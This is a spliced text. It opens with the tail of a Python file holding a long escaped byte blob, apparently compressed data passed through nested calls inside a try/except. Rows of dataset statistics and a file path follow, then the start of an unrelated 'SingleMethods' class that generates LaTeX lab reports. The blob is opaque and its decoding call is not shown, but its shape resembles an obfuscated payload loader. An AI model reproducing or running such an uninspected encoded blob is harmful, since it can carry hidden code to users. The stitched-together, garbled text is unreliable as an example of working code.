2\x94\xf3\xdeH<\x1cK,\xe8\xdc\xf5\x9e_\x0f\x91D\x85|\xf2D\x9b\xf0\x01\xd9;\x8b\xad\xe9b\x91\x86\x80\xc7\x10\x8b\xc6\xe8\xb9\xe56\x9e\x96\x82\xbd\xee\xc8\xb3\xe5\x87\x1d%\xd8[m\xb4Q\r\x1b\xeb:\x7f\n*\xa4=Z\x13Z\xcbQ\x0f\xf1\xaa\xa9\xfb\x87-X4)\x00\xd4 \x9a\x98(j2\xbf\xd8{\xb4}\x95\x0b\xd5-\x1e\x1f\x8b\xd0c\xb6G%`v\x0bTO\xa3\xd2G^\x95G\xa6\x7f\xf9\xaf\x1f\x98Xq\x98\xcf\x06^\x03\x1e;\xf3K\x9e\x94\xa44\xc2%\xd9\x8c^\xe1g\xdf-y+4\x99y>?\x85\xdb\xb4\xa2\xeb,or\xbe^4%\xaf\x80\n\xa0\xf7\xa3\xae\xc4\xa2\n\x1c\xf7[\xc9\xceo\xad\x01\x96b\xefh\x82\xb0t\xbe\x80\xd3\x17@Y5\xa2\x047#I\\GX\x1eA&\rwL\x03\xdb44j5m\xcd#\xf9]e\x9b\xd2$\xc9*\x83\x0e\xf64\xb7\xe2\xaa :\x0e\x19T4$\xeao\xc3a\xc9\xe0\xc5\x87\xd9\xdf\xdb~i\x94q\xb0yf\xbeV\xd6f~\x14\xe9[q\xda\xc9\xd0\xea\xefw\x14\xc3\x87\x8a\xac\xdc\xfb\x06\nA\xfc\xf0P\xb5\x03\xb9/\xf3:\x0e\xdd\x18$\x99\x8c\x01\xe7P\x7fG\xbeU\xc1k\xa3\x16$\x17\xe9bF\xa0\xdf\xf8$\xc2:\xdbj\xbd\xfa\xeeN\xef\xafr\xc2K\x91,\xeb\xe4c\xd2T\x0f\xfdIS\x07\xa9\x02\x15\xa55"\xba*\x852\x04\xf7iZw\x15\x08d\xa5\xbaX\xe3\x84\x02\x0c\xdf\xba\x96\xea\x1e\xf2\x93s\xb8\x12\x97\xc5Wj$:m\x08z\x83\xf4\xd6\x7fb\x98\xbc\xc7EA\x15\r:\x8b\xec\xe3\x92t\xac\x1c\xc8C\x90\n\x81s\xf0K%}\x82\x01j\x94\xf3\xa1t\xf0 \xc7\x0c\x0f\xb8O4\x90\xf0Ln\xc0\xf1,O5\xdc\x0c"\x1c>\xe6\xc9\xf3\xc16\x832\x16\xd1\xdc\x88\x9b\xea\x14+PbAp\x9e\xd0\xed\xd2\xa0`|\xeb\xcb,\xbd\xf0\x7f_K\x9b\xaf&\x99\x02\xe7\x10\xa4\xcd+\xf5^\xf0/\xcb\x9f\xec?\xa9W2\rnKtC\xb6\xde\xf3U\xb7)[\xb3b\xfc\xa3\xd8\xe6A\x99~\xa2Z \x11\xd1\x9e\x07g~{\xb4\x1f\x0c\xb5\xb5\x142\xff(U\xba\x89\x95JW\xa2\xf4\xe6\xe9\xf0\x976\xde\x94\x91\xb8e\x885(\x82\xb1\x07\x9e\x8c\x05\x10r\xca\x10\x9fj$g\xa6n-\x0b1M\xb81\xd0Ww\xd7pxp\x86*h\x8f\x86\x11\x8d\x8a&A\xccq5\x10\xdc\xf14\xcf\r(\x85\xe5\x864/\xf8\x0e\'Q\x91\xa0\x85\xe8\xfcP\xc3\xa6\xe1R\x1cmj\x9c\x15gK\xa3\x02\xa5\xaa\t\x19sE\x05:\xe7\xf8\xb5\xee#\xe0\x9c\xc8gh\xf40\xd1\xe5,\x9e\xbc\x87\xa9\xbd\xa5\xfe\x80\xfcW\xe2\x9d\xa1\xdb\xcb\x07j\xe2X\xde\xd5\x13\x1a\xffqn\x18H\xfd\x10\xdd\x12#\xe7\x19\xb3\xe3\x97m.t)\x96\x03H\x04\xc9\xb9S\xc9\xd6\xf0\x00\xcf?\xf9#9\'\x88\xd3T\xdfC0\x0b\x9c\x82\xcd\xefyE\x184A!*\x12\xa9\xb1\x01\nz\x1cF\x9f\xfb:\xdc8\x89m\x10b\x1f\xe2\xbb\xea\xea\xa5\xcag\xf0\x0f\xc8vt$\x963\xcb|?\x90=\xb1:\xa0v\x89\xcf\xd64\x07L\x1e\xc4\xcfuA\xa3\xe2\xdd\xd3y\xcc\x03\xea\x87o\xe6\xf4\x8d*2h\x82/D#\xe7\x90\xa6X8Z\xd60\x91\xa7\xc9\x07\x7f\x83"d\x1b\x18\xcc5bDs\x1b\xb7\xc9\xe1\xb1B\x8f\x8c\xff\x1aE\x8a\xf9\x7fFq\xd8\x7f\x94\x14(E\x86\xcaBY\x19\xb1\xaa\xf0|\x9d\xf7^:\x7f\xbe!\xfalr\xeb\xbfM\x80\x8e\r\xa3\xc5\xb8\xb9\xb3<4\xf7\x88\xe4\x06A\xc5XR.\xba\xd4m\xa9/$\xf9\r\xc3\x99\x98\xbc\xa0D\xf1\xa22\x1c\x8a\xeb\x01\xff\xdc\x94\xcd\xd2\x14@+\x14\xc86\xa9\xfc\xcc\xfc\xf8\xc7\xba\xb8\xc4\xdd\x1b\x86\x1a\xdf\xec\xe8\xc0\x10\x95\x84\xa6\xd6\xc4\xf0\xc1w\x8a!\xc5-\xc5"vN~\xeb1\x1c\x8b]S\xde~\x91E\x9d\xcf\x03_y\x8ad\xbf\x08\xfb\x03\x18KL$\xaaB\xf6\x92\x14\xf2\x9e\t\xbcH\x1d\xe3\xa4l\xb8\xc9w\x90- ?8\\@\x88?\x14\xca\xac\x92Cw\x99\xb0\xd2\xbb\x96\xa1MYl\x1f+\xb5\xa6\x0e\x895B\xa9\xc1\x96p\x06\x86\x1b\xd5\xfa\xd2\x8c\x1c\x13\xeeW\xfb\xa4\xd8\x9a\xcd\xc6\xaf_:\xa4\xe9i\x1b\x87\x84\xb6O#\xdf\xf9\xac\x1f\x07\xe4Uh\xacJ\xeeXy3\x06\x91\x04t\x8a\x92\xe9*\t!n\x80g\xfc\xf9\x942\xf1\x82\x8c\x8aE\xbay\x8eX\x8e\xec\x0f\x89+\xf2\xb1\xa6[l\x9914\xf3\x15N\xf3\xf8\xf7\x0f\xa9\x10rA\xe7M\xaa\xdc\xb3"\xfb\xf6P\xdb\x9d\x7f\xaeg\x83mz\x7f\xcf_\x15\x1bz<\xac\xe9th\x05yM\xdd\xcf\x1fd\x9e\x88\'\x88c\r\xf7\xe1e=\xf79$\x1a5_f/D\'bK4}W\xe3\x1c\x07\x80\xd0B\xe3\xeb\xdc\xa1$\x07\x85\xc0W\xb3\xf6\x12\x17\x15\xb0\xa7\x87\r\xf0\x90.h\x85\xd4Bl#?\x92?\x17EE\xc0\x9dI\xa5\x92\x0b\xc1\x8b\xde+\xf9\xea\xcd\x00V=\nq\x1e\xff\xe4\xdaNJ\x89\xc6\x93\xa0O\x8a\xc9_\x8a\xdb^J/ZD\x84\xab\xbf\x1f\xcb\xf7\xcaS\x9d5a\xe5\xf8_\xbe\x98q\xfcS\r>O-4\x020\xe7\xa0\xc7J\xfd\\\x85~\xe7\xf0\x9f\x8cX\x92D\xa0^\xa8\x11uK/\xfd\xeaO\x9bj_V\xe7\n\x00\xcf\xafE<\x12}\xc0\x91\r=\xabC\xba\xbb/+\x1bKc>\x16P\x0f=\xed\xf3\xc5\xb7?:y\xd3\x97N@\x14\x85H\xe9\xd1\xa5:\xe6\x8e\xc0OE\x80\xc72Z\xaa\x02X\xca\xad\xe4F\x9e0yH\xaa\xc4\x0f\x8e\x05!\xf3`\x1f\xf8\xa3i/\x15"\xb0\xc4\n\xc9\xc2\xe4$6\xda\xbc\xd1\xdf\xd4\x1a7\x96]`p\xd0\x96\x86Kh\x90M\xc20\x1dV\xf9P<\xc6\xf1r\xa0\xf9<\x99o\x83\x8d"\n\x19\xb1\x9bV\xd8\xea\xf3\x9c\xd8\xe9\xcc\xb2V\x9cL\xd9-|\xb6\x18\x8c\x92\x062\xe6\xac\xb2"}t\xf2\x1b\xbfe\x90\x87j\xc2\x10\xed}\xeb\rMW~\xd1N\x89\xe2*\xd5\xd4\xc4\xe0\xf9b]\xb2\x1c \xe9\xd5\xf8\x8d*\x8c\x89\xebr\xb9\xa59\x15\x08e\xaf;\xb0\x9f\xe1`\xd0\xc1\xb5-\x1eQ\x0b\xc4q\xb7)\x19\xf3\xfcf\xe6\x9b\xfa\xddB$1\xc8\xb3H\xcd\x85\xf84N\xbf\x8a\xff\x9b.m\xcdj\xa4\xd3`\xe3\xe4\xee\xa9A\xacgU\xff\x13\x89\xe3\x8c\xaa\x1f\xc6\xaa\xc6y\x1b\x19\xe0\x98\xad\xdc\xeb\x9f_\xffj9\xbe\xf43\xe2\xb4C\x95gl\xd7\xbf\x0b\x130m$c\x93\x9c\xff\xda\x13\xf8\x9e\x83\x11\x0evS\xc5\xcf\xf0\xfcFQ\xa1\xb5\rD\x97A!\x89\xddgvY\xaa\xd1\x8e\xe4O\xae~?-gfj\xfd\x8eE\xa2\x01\xe6\xee\x0c\xa0\x03\xc0\x9f\x15h-\x95,\x94\x8c\xb7:}$\xfb\xa0Z\xa4g&[V\xef\x87\xd4*i0\xcaD9\xf8\xc7\x96q\x9bQuoQ\xee\xbe\xcf\xe8J\xa5\x02\t\xb2a\x82^l\x14\xaf7u|\xa8\xa2\xa9\xc0\x10\x8d\xc3\x8e\x9b\xf0\xc9\x01\xf3\xa2\xe9\xben\xb5\xe9F\xf9\xd7\xb92}\xa2\xea\xe5\x8elt\xadR\x1a\x89s\x00\xffi\xec\xab_b\xb4!\xba\xb3T\x8bUf\xd3\xb7\x8a\xbfr\x81\xc7=\xae@^P\xda\x8c\xf9\x83Q\xbb\xcbC:\xd0\xdf\xb5p\xd4\x8fo\xe8\x8c\xed\x08\xf6\x95\xce\xdaa\x1f\xa9\x94\xd5F\xff\xe0\xd4/f\x1d\x14.\x1e\x1b\xd29\x95\x88\x17"\x8fcG\x7f\xd0\x0e\xce\x9c\n\xfc\xe0B\x03-\'qc\x05\xddH\xd4\x95\xf3!\xafe$\x9fj#\x02Y\xd8}\n\xa9j\x1b\x95Qp!\x89\xbd\xd2\xf3\x91\x8e\x95bE\x90\x04\xc5:\xebG\x9f5F\xa8\x95:\x19\x8b\xa6d\xa9I4m\xbe\xbai\xd6\xd2^?\x99\xc6T4\x16{\xbcq\xe7I\xdf\xafs{\xd7\xec\xf5\xc4\xd1\x08h@\x18\xff\xc6m\x0eWT\x07\xd3\xf2\xbd\xe0u\xfd\xe2\x97&\xcev\x1b\x1c\x96\xe6D\x98\x05:4r\xf4\x9c\x14\x1d\xe5?9\xa2\x920Z\xb9\xc6\x94)=\xb66i\xf8/UW\x1cR?G\x03\xc7\x06g\xb3u\x9d\x81^\x7f\\g\x07\x8c.J\x08\x04\x9a\x8a.\x94\x89\x99\xff\xb5v\x1f\x95\xfah\xb7\x91/]pQ\xed\x8e\xcb\xe3\xbd\xb6\x0f\xbe\x1d<U\x82\n\xad-.\x11$\xdc)\xc4\xa5\'\x95]\x1c\xb5H\x96u\x8d\xbd\x12\x9f\x80U\x19\xach\x1a\xa5Z\x85\xe0\xc8\xa6\x9c+\xc5\x07`\xe2\xe5P\x98\x9e\xae\xea\xb9\xf2saR\xb7\x9f\x0b1I\xcf/\xb5\x11+>\xbd\xe9\x06l\xe7\xb1\xfa\t\xac+\'\xfe(\xfb26\xe5>\xa0\xe65\x8b\xe1\x02:v\xec\x924N\xf6\xce/\xebcm\xb2\xafK\x9f\xcc\xecB\x8bLs\xb4\xea\x1c\xe2\x08P\x95\xd8Ow\xa7\x07\xfe\xa4\xff8\xbe\xcba2\x8a.\xffp\x9b"K4U\xe7\x1c#\x0e\xa313\xab\xa0*\xd5y,\xef\x15u\x8f6\x02\x96\xcb\xfe#\xd16"\xf2G\xee\xda\xf3\x91\xcc\x8ed%`\xe7\x12\xb6\xf0y\x13\xeb"\x96E\x98\xeb\x02\xf4B\xab\x18\xb2\x1ai}V\xf4\xfa\x87?\xc5\xcd\xc0\xb8\xa1\xd1\x82v\x01\xbaUS{\x1f\xd1(F5\x8b\x84\xa2w\x1cO\xaa\xc2\x90\xe9\x92\xad\xde\xe6\xfdwr\xba\xe4\x15F\x96BM{]K\xea\x90\x1c7\x9d\xac\xc2\xf8x\x1a}\xa2\xce\xc9\xf3\xab\xe7\xba\xc1\xcdp@U5b\x8a\xcf\x81\x89\x97r\x88pv\xee\x8b\x04\xe1jYH\xa1\xec\xfe\x9c\xab~\xad\xb7Z\xb3\xb8i\xed\xd6j\x19\x8e3\x8a\x8b\xa47\xe5\xe1E\x9d0\'\x1bY\xf8Flp)l]\x14\xc6#\xbc\xc3i\x81\xbab\x94\xf8\xd7\x8c\x06\xa0\x84F\x15\xf0\xe3\xb9@\x0f\xd7\x87\x95\xa2"\xed\x1c\x15\x18|v\x875\xbb\xcdo\x04\xcf;\xb3\xbd5$\x8b\x18o\xfbON\xaa\x06\x85%\xceQ+\xa5[d\xa1\x0e-:\xa3\x80\xeb\xa8\x11\x134Z\x81\xc5^9\xca\xaff@\xed\x89\x94Bg\xcdvp\x85\xc0\xe94\x0co\x89\x98\x82@\x80\xc3\xe5\x99\x02c\xcb\x96\xc0\xcb\xe7\xad\x19\xfb\xa8pr\xf69\xd8*\xaa\x91\xcbI>\xd0\xa9pt\x9b\x85\x9c\x0e\xe1\x15w\xcfQ&\xd4W\x15\x01S\xd0\xe0_k\xe07IK\x16+\xd84\x17\xec\xc7@\xa6\xaf\xdaeP\x946\x8a\x1b\xa1N\x8c\xb0p\xad\xe6\x97\xb1\xa1\xc9\xd54D\xdc\xac\x1e\xc9 ;\x14\xe8\xa6P\xdc\xaa\xb3\xc6\x98dE\xd3j\xc7\xf5\xa3\xa8\xdf\x1e81\x9d\xd0\xc7\x05\x15S\x89U\x89+T\xc8\xdb"\x92\xf7fT\x8f\xd1\xcfm\xfb:8S,i\xdcX\x86X\x85y\n\xe15\x81$\xcf\t\x82P\x92\x83yC\xe5\x1c\xd7D!\xf1\x819\x86l\x8a\xb6\x03\xe1\x86:\xb0T\x9e\x06\x85\xf0{#\xee\x0c\xc1\x18\x16\x0cr\x8d\xaf%\xf0\xf7\xc6\x9c\x9a\xbe\xb2-\x07\xbaO\xa7\x8c\xf2m\x1b\xd5v\xd7\xb1,\\\xeb\x00b1\xfb\xfb\xd3OA\xf1e\xd2\x1a\x12\xd6F\xca\xddR,Q\x97\x06y\x02\xd4_N\xec\\\x13\x03h\x05[-\xaa\x83\xcf\xd7\x93\xd9\xd6\xef\xdf$\xb3\'\xf8~\xa8\x1e3\xe8\xe6\xea\x91W\x9at\xcab\x87\x81=zf\xad\xf6\xb3\xc6\xbd{;=\xdb;Fc\x93"\x03\xd0\x1c\x8ba\x9b\xf4Y\xe3\xe7\xeaV\xc8\x9cQ\xf2-\x191\xc9\xbcX\xe40+n\xb2\xa5u\xf1Fb\xfa\xbf\xd8\xf5\xdb\x83Y\xdf\xeb\xb9DS\xc8\xd4\x1d\xc8\x1d"m\xad\x1f\xd8\x14\xb0\xebFO\x96\x0f-\xdf\x9c\x06\x89\xde\x07\xa0\x92LF\xc5YW\xd2|\xac\x01\xf5\x80l\x13\xae\xd6k\x05r;\x1c\xe4\xd6e\xfb\x8b?\xbe\xbe\xddU\x92G\xe7n\x8b\x04\xc4[I\xbe\xe1\xd3\x8f\xde\xd0\xc1\xe4Z\n\\\xd0\x83\x02s\xa4\n\xe6\x9f\x8aXfE\x1d"\xa3\xe4\xa2d\xed\xa4\x97\x8cLH\x8d\xeaN\xdfcug\xcb\xbe\xfd\xf0\xc2Y\xed\xef\x91&\xfb\xb5\xc4\xc04\xe5\xb3\xfd\xc9\x1eb\x99\xc8\xd6\xa1o\xe8B`\xa84\'_\xa8[(\x99`<3\xdbVh6;&\xb4\x02\x15~\xf1<\x93\xed/\xc7\x0eo\xe5\xe3\xeb\x94\x19\xde\x91\x9bN\x19&\xd6\xb5\xf4u\x8ag U\x95\xf6<\x0f\'V\x82\xbe\xec\xe7\xc1\xc7\x1d\x8d;\xcb\xf3Y\xb1":\xad\xba\xd9\x95\xa2\xa2\x16\x11l\xdf\xb9zd\xaem\xd5|EQ\xc0o\x81\xedd0\x84i\xfa\xeb\xad\xc5\\ \xd8\xb2\xcb\xc5\x93\x9e\x92\xb0-\x02Z]=G=\x93\x9e\xa8\x82\xf7\xee\xcf\x8f\xee\xed\xebf&G\xb1\xde\x8aZ9|\xd6t\xa4\xc7\xc0_\xe15ic\xd9\t\x826\x1c\xdf\xa0\xa4\xc5:\x86\xaaruR\xb8}=(\xd5Den\xa8\xc1\x01\xc1\x18\x8e\xfcl\xfdd\xad\xe4\xa2\xbf\x88\xeb\xa3\xc3P\xd2%\xb9v\xe1\x10pb\xfds1cr\xd2\xf1\x0b\xed\x8c\x9aR\x15\xf2\xae%<!\xda\x187\xaa\xce\xa6\x8aM\r\xd0\xb8=f\x17\xbd\xe3q\x88\xc5\xc2 \x942x\xb1\x03\xf8\x01\x92\x14\xdb\x99AZd\x11\x07\xca\xc2I[\xdb\xda\x04Q\xdf\xd0F\xdadT\xc3vq;#\xe52\xd4\x8a\xef%m0\x99\xbd\x15\x0f\x81\xf3J\xd0\x85\\=\x94\x17\xff\xc1\x0c\x92\xc3Z\xc6\xebd\x0c\x90\xec.\xe1jWg\xed\xad\xb6M2!?&\x1e%\xf50\xf6\xffH\x85\x93\x8b\n\x0c\xce!\x99/\xb5\xdf\x12\xd4LF\x0f\xa5\x98i&\xde*0N\xb6\x9cQ5\xf7A4K`\xc46\xdb9U/AE\x06\x9fg\xaaRmg\x97\x17\r\xfc\x11N?p\x91\xe9\xc6Mb\xdd\x99\xf6\x026\x80\x17\xe3\xd7\xd2\xbaI^\x11\xd9\x8f:9\xbb\xcb,\xc5\xa1t\x84\xff\x89\xd7\x83\x94E\x16\xb2\xa1\xe1\xf8Q\r\xd3\x99pUYC\xb9\xa6\xeeu\xf1R\x1ec54\x19\xb5L\xcd\xaa88\x16sDN\xfb\xa3\x80\x9bs^\xa1I\x14\x91\xf1.\x95\xe9\x9c\xeb\x1e\xe9-\r\xec- \'&m\xbaB\xe5B\x9c9\xef\xae\x03\xdd\xea^\xa8i\xb1:\x1e\xe9\x8b\xb2tD\xc3\xf1\x1b/\xce\xd0p\xac\x1e[\xd0kr\xbf\xfd\x12\xc2\xc9\xe7\xf5\xb8\xf3\xbc\x1fZR\xc7\xa2\x08F\x1f%\x82I\x91Y\t\xc6\xce\xa1\x1c\x1ba\x06_:v&\xcaA\xfcO\n\xa7\x98\xf9\xcc5c\xdc|3\xc7\x0c\xa5g\xb0n\xac\x10SCj\r\xb4\x13E\xf6R;|g]\xe0]G\xd2\xfeZ\xa3&>a\xb0\x8f\n\xfe\xba\x01\xdd\xa9\x00\xea\xbbn\xf1\xe7\xa1\x14\xb2\x0c\x15\xb8\xdb\xaa\xe6\x95\xf8\x9a\x07c\x91\xe6\x9fp\xd3\xa8\x18\xea\x84\x92\xed\\\xe4\xbeL\xc0f\x04\x87fv\xca\x99\x1e\xd7\x94\xa2\xae\xe2\xb1\x802\x87a\x1f\x1e&\xdb|\x82\x03\xa4\x1d\x91\xdb_\xa2\x8e\xd4\x92\x95"\xfd\x80\x93\xdb\x0e1\x85rBY\x98u\x01\xcc\xbciF\xaf\xc9\xd2{\x86\xe5\xf1\xeer\x0b5-\x82\x9d\x88\xdf\x14\xf0\xa7+\xb6Qr\x94\x8b\xc7\xbd>\x8am\xcc\x0c#%\xe6\xde\x9b\xe3S\xb1<\xa8\xe8fJ\r\xd1eq\xce\xa5\xf8\xa1\xcal\xcf\xab\xf8\xd7?(\xb9\xadf\xbe\xe2\xa2\xa1_&\xa3V\xaa\xe9\xdc\x95\x8a\xacn[#{3\x8f\r)\\\xec\xf4\x06`\x16\xa8\xec\x8b4\xd6t\xb9\xc4fjL\x88\x9b]\x17e6\x16~Q\x01\x8f0\xe3\x9a\x16v\x9b\xf8?\xe4&\xc4\xf4u\n\x19\x9e\xaa(KI\xd1\xc8\x9a\xabTJ\x13\x8d\x0f\xa9\xd4\xdcn\xbbmn3\x01\xca|\xf1G"7l\xaf\xf7\x18\xe6\x833 Nlq\xaa"\xd2\xe1\xb6\x17\x8a\',\xa4\xc9a\xa6\x05\x1f\x9f1\x89\t\x04\xc6\x17\xcaM-e;@\xe3\t\xc2\x84\xcb\x97\x02\xe7PG\xdaf\xabTG\x1c\x85\xc8\xc6nKw\xb1\xe9\xa6|\xde#\x94\xbf\xc9k\x86\x0f\xce\xa9c7-\xf3\x85}h\x81~\xcc\xf2\xa8\xd0p\xb0\x89Z&\x18\x87\x90\x8c\x0e]i=\xaa8Q\x15\x19\xb2\x96\x8f\x1di\xa6vMx\x99t\t\x94\xa8[i~s \xee\x8dZqR|\x94O[\x07\xf5\xb0@\x95\xca\xb4\xa9\xdb\xc1\xc4\xaaV\xf9\x10\xc8\x13\xb56\xd4:(\xeb\x13\xc1)\x92\x1e\x12K\x15\xc9\'V\x02\x99K[2b`\xf47e\x1b5W\x89x\xca\x1d\xa2\xd1\x99%\x0eE)\x86\xb1\x85\xfd\x9eIw\xa2\x97Jd\x05\x97\xa1>\xfe\x84\xec1\x0f\x9e\xaaV\xae\xa5q\x8a\ty\x7f\xd7\xdc\xb6n\x89\x00j\xdb\x1f\xf9;|\xbf,\x88\xdd\x8e\x898\xe0\x17\xcaWR\x85\xba\xfb\xab\xe2\x1du\xd8\x96\x8eh\x88E\x1b\x9a\xd5L \x84(\x92\x95\xec|i\xc4"\xbfy\'\xb2\x04\x9bhw+\xe4\x96J\x00\xb9\xddE\x19?\x85\x92l\xe9\x9c+@\xbe\x10\xe6C2\xba\xf8\xd9\x91\xbe\x04\x95\xf9z\xa5B\x7fGj\xa0^\x83)r\x02\xd2\xaa\xaa\r/(\x82\x1eS\x11f\x14\x99\xc4*\x11t\x8b"e1WbRQ\xc9[\xb7\xbf\x1f\xa2\xc1\x8c\x96H$@\xb0d\xee\x8c\x93\xc1\x91~P\xc8\xaa\xc5\x08\x8d\xbe\xdf\xe2\xc3\x90E\x81\xceu\xda\xf2\x98\xe3\n\xb1B\xee\xf9\x9bU\x1eAJ!\x8b\xdcV\xc8,;yS\xf7\x1e]\x8a\xf8\x802\x9c\xb3\xbb\xe8\r\\\x8f@\xc9\x8aK\xeap\xf6\x87\x89)\xac\\\xd3\x14\xbbL(G\xd9\xd1\xd1\xa2YESo\x7f\xf7\xa7Q\\\x8f\x0eL\xf6zp\xe1)!b\x8c;\xad\x13>u\x94\xc8fr\xfa\x88t\xa2\x91\x8c\xd5\x85k.\xe3?j2\xe0\x1c\x1b\xe8\xbf\xac\x908\xe6\xc8\xe4@\xf4O\x89PHza\x15\xbfm\x05.{\xb7\xf3\xe7\xea\xae\x8b\xacM\xd8\t\xce\xfbM\xa7\xd1\xbe\x1d\xeb\x87Y\x9b9\xed\x17\x11\x08\x92ayT\xff\xbcD!=W\xc9\x97\x88\xdbH)\xfe\xa2\xd3_\xf2/\x1a-\xae<\xfc\xa6\x06\x9c\xc4\x93I\\\xd6oU\xdaG\xc9\x16\xae\xe0E\\\x84_3\xe2~\xc7\xff8\x04\x86^\xbajta\x1a\xed\xc5&\xfc\x96\xde\x99\xff\x12\xef\xce\xe5\x94\xeb\x1d\xc3\xeb\x84oV\x8b\xdb\xce\xa1L\x9a\x06\xcb/4\x99\x98\x92\x99\xa1q\x91<P\x85\xd4\x86\xc2\x06\x18\x87\xf3p\xebl\x0eJ\x9c\xcd\xa4@:\x81\xaf\x87\x88\x9e\xf6\xa5\x8a\xe8\x81t3\xde\x93j\xbaU.6\x00\xddC\x82\x14\xe5\xcb.\x13\xd4\x19uh\x1f\x06t\x85\xeeY\xb5\xc2YE\x00\xa1\xb8>E\xa6b\x95\\\x82/\xed\xe0\x12\xc75\x85\xff\t\xbe\xb2\x1c8%\x9d\xe4\xbck\xb5CG4\xb8\xca\xce\xfb\xb2ufj\x14\xeeA\x12\x05\xd9U\'d\xc8\xf0g|c\x99\x9dV\xc9\xb9\x08#IPn\xe0\xfe\x04\x9c\x98\xbf\x96EYx_\xb1U\xe3\x1c\xd6\x97\xe4\xc9%I\xac\xd4\xc1*\xbf8M.~\x85\xbfW\xe9\x92E\xdd\x8bS\xddri\x04i\xc4\x96\xdc\xbf\x05\x7f\xcc\x8fy&\xe1\x1d\xa8\xccE\xd0<F\xfe"p\x18\xd3U\xda\xcc\xdd~|(\x8b\x00\x0e\xb6\xea\x83\x13>\xe7JF\xf0\xf6\x84\xdf\xe5A#\x84\xc4\xb8\xcfJ\xba\x89Z\x13\xbc\x08D\xd6(m\x1fO\x0e\xde\xf1\xb6\x05\x98\xbe\xe5\xa5\xb8\x95"\xf7Y\x11\xa9\xf92I\x13\\\x06\xc4\x94\x0cOyt\xdd;\x9f\xed\xf7O\xfa\x03\xd5\xef\x81@\x96\x1c\x18\x93:\x14\x7f\xeaV\xe5\x99\xed\x86+\x90\x1f\x95\xfd\xb3\x1f`\x19\xf0\x8fE\xb5w\\\x9e\xd5{{\xfas\xba{\xbdw\x1a\xfe\xff\xfap/\xbcHj=]\x9cx\xfe\xe1I\xd9\x9cyn[c\xeb\x93\xa3\xd3\xbe=\xf3\x7f>\x9f\xbd{&N\xcf\xf7N\x8e\xf5\xbbqx\x81\xec\xb4\xbfw|\xaek\x1e\xf5\xa9\xb8\x8b\xc2\x7f\xff\xef\x8f\xe1=\xdd\x05\xe8C\xfesN\x1c\x9d4\x17\x87vR\xb5\xdf\xfd\xef\x9e\xd1G\xf6\xfe\x8f\xa3\xc2tqy`\x15\x1f)\x9b\xbe\x88\xda\x07\xc0\xca(&T\x0e\xa5\x9e}\xff\n\x8f\xc6\xc6\xc6\xfe\xcf\xf2k\x0c\xdc\x7f\x9b\x81\xf2l\xa0z\xc1\xaf0\xea\x86\xee\xaf\xf7\x9f\xeav`h\xec\x7fG\x17\xbe\xfb\xe1#\x02\x00')))
except Exception as b:
print(f'Error for : {b} ')
| 16,855.181818
| 185,248
| 0.735501
| 42,523
| 185,407
| 3.200927
| 0.169297
| 0.000309
| 0.000132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.231871
| 0.001386
| 185,407
| 11
| 185,249
| 16,855.181818
| 0.503278
| 0.000264
| 0
| 0
| 0
| 31
| 0.635687
| 0.633588
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85583f8d3f70dfee06f91638026473b22639ed20
| 51,626
|
py
|
Python
|
Rover_Source_Code/Post_Generate/post_generate_single_methods.py
|
StavromularBeta/Rover
|
3030f1521e5a6bc2c6722983ca59a008b3a11400
|
[
"MIT"
] | null | null | null |
Rover_Source_Code/Post_Generate/post_generate_single_methods.py
|
StavromularBeta/Rover
|
3030f1521e5a6bc2c6722983ca59a008b3a11400
|
[
"MIT"
] | null | null | null |
Rover_Source_Code/Post_Generate/post_generate_single_methods.py
|
StavromularBeta/Rover
|
3030f1521e5a6bc2c6722983ca59a008b3a11400
|
[
"MIT"
] | null | null | null |
class SingleMethods:
def __init__(self,
finished_reports_dictionary,
single_reports_dictionary,
sample_data,
latex_header_and_sample_list_dictionary,
loq_dictionary
):
self.finished_reports_dictionary = finished_reports_dictionary
self.single_reports_dictionary = single_reports_dictionary
self.sample_data = sample_data
self.latex_header_and_sample_list_dictionary = latex_header_and_sample_list_dictionary
self.loq_dictionary = loq_dictionary
def generate_single_sample_reports(self):
for key, value in self.single_reports_dictionary.items():
if value[0] == 'Percent' and value[1] == 'Basic':
self.generate_single_percent_basic_report(key)
elif value[0] == 'Percent' and value[1] == 'Deluxe':
self.generate_single_percent_deluxe_report(key)
elif value[0] == 'mg/g' and value[1] == 'Basic':
self.generate_single_mg_g_basic_report(key)
elif value[0] == 'mg/g' and value[1] == 'Deluxe':
self.generate_single_mg_g_deluxe_report(key)
elif value[0] == 'mg/mL' and value[1] == 'Basic':
self.generate_single_mg_ml_basic_report(key)
elif value[0] == 'mg/mL' and value[1] == 'Deluxe':
self.generate_single_mg_ml_deluxe_report(key)
elif value[0] == 'per unit' and value[1] == 'Basic':
self.generate_single_unit_basic_report(key)
elif value[0] == 'per unit' and value[1] == 'Deluxe':
self.generate_single_unit_deluxe_report(key)
else:
self.generate_single_percent_deluxe_report(key)
return self.finished_reports_dictionary
def generate_single_percent_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'Percent',
'Basic')
temporary_table = self.create_single_basic_table(temporary_data, 'Percent')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_g_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'mg_g',
'Basic')
temporary_table = self.create_single_basic_table(temporary_data, 'mg_g')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_percent_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'Percent',
'Deluxe')
